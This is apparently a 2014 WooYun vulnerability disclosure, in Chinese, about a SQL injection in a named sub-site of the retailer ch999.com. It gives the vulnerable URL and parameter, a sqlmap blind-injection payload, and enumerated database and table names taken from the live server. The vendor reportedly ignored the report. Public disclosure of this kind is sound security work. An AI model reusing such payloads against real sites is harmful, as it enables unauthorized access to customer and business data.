当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-071149

漏洞标题:三九网某分站存sql注入漏洞

相关厂商:三九网

漏洞作者: 路人甲

提交时间:2014-08-05 18:28

修复时间:2014-09-19 18:30

公开时间:2014-09-19 18:30

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-08-05: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-09-19: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

三九网某分站存sql注入漏洞
求乌云一邀请码

详细说明:

链接:http://m.ch999.com/brandlist.aspx?cid=2
证明:cid参数存在注入

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: cid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cid=2) AND 1961=1961 AND (5215=5215
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
(IN)


列出的数据库

available databases [11]:
[*] CH999C2C
[*] ipaddress
[*] Job39
[*] master
[*] mm999OA
[*] model
[*] msdb
[*] tempdb
[*] v5shop
[*] web999
[*] web999_other



Database: web999
[84 tables]
+-------------------------------+
| AdItem                        |
| AdKind                        |
| AppList                       |
| ChinaMobileContract           |
| ClubProduct                   |
| Comment                       |
| CustomCode                    |
| Dv_User                       |
| ExternalProduct               |
| Groupbuy                      |
| IndexModuleInfo               |
| LimitBuyRecord                |
| LogisticsTrack                |
| MyLabel                       |
| OneToBuy                      |
| PARAM_COLL_VIEW               |
| PackagePlan                   |
| Paimai                        |
| ParamValue                    |
| PromoCode                     |
| Repair                        |
| SYS_USER_MENU                 |
| Soft                          |
| SoftClass                     |
| SpecialPackageFee_bak20140113 |
| T_FlushCacheServeLink         |
| T_UnicomWKPackage             |
| Taocan                        |
| TaocanDX                      |
| Tryout                        |
| TryoutComment                 |
| TryoutReport                  |
| TuanLog                       |
| UserInfo                      |
| UserRight                     |
| VIEW_PARAM                    |
| VIEW_PRODUCT_PARAM            |
| VIEW_PRODUCT_ST               |
| VIEW_PRODUCT_ST_INFO1         |
| VIEW_PRODUCT_ST_INFO_ADMIN    |
| VIEW_SEARCH_PRODUCT2          |
| VIEW_SEARCH_PRODUCT_O2        |
| VIEW_ZERO_BUY                 |
| Web_Comment                   |
| alipayInfo                    |
| areainfo_old                  |
| asyncData                     |
| brandCategory                 |
| category                      |
| category1                     |
| codeBack                      |
| h1                            |
| kcStates                      |
| limitbuy                      |
| news                          |
| newsclass                     |
| product                       |
| productCS                     |
| productFetureInfo             |
| productInfoOld                |
| productPic                    |
| productStDetail               |
| productStandard               |
| product_cs                    |
| product_join                  |
| product_price_basic           |
| product_price_pk              |
| productprice                  |
| querecord                     |
| searchrecord                  |
| shopDetail                    |
| shouhou                       |
| shouhou_bbs                   |
| shouhou_comment               |
| t1_                           |
| tSiteErrors                   |
| taocan_card                   |
| taocan_cost                   |
| tmpBasket                     |
| userMenu                      |
| webad                         |
| webcall                       |
| webinfo                       |
| zol                           |
+-------------------------------+


漏洞证明:

QQ截图20140805180120.jpg


11.jpg


没在继续了,还有几处你们自己找吧。

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝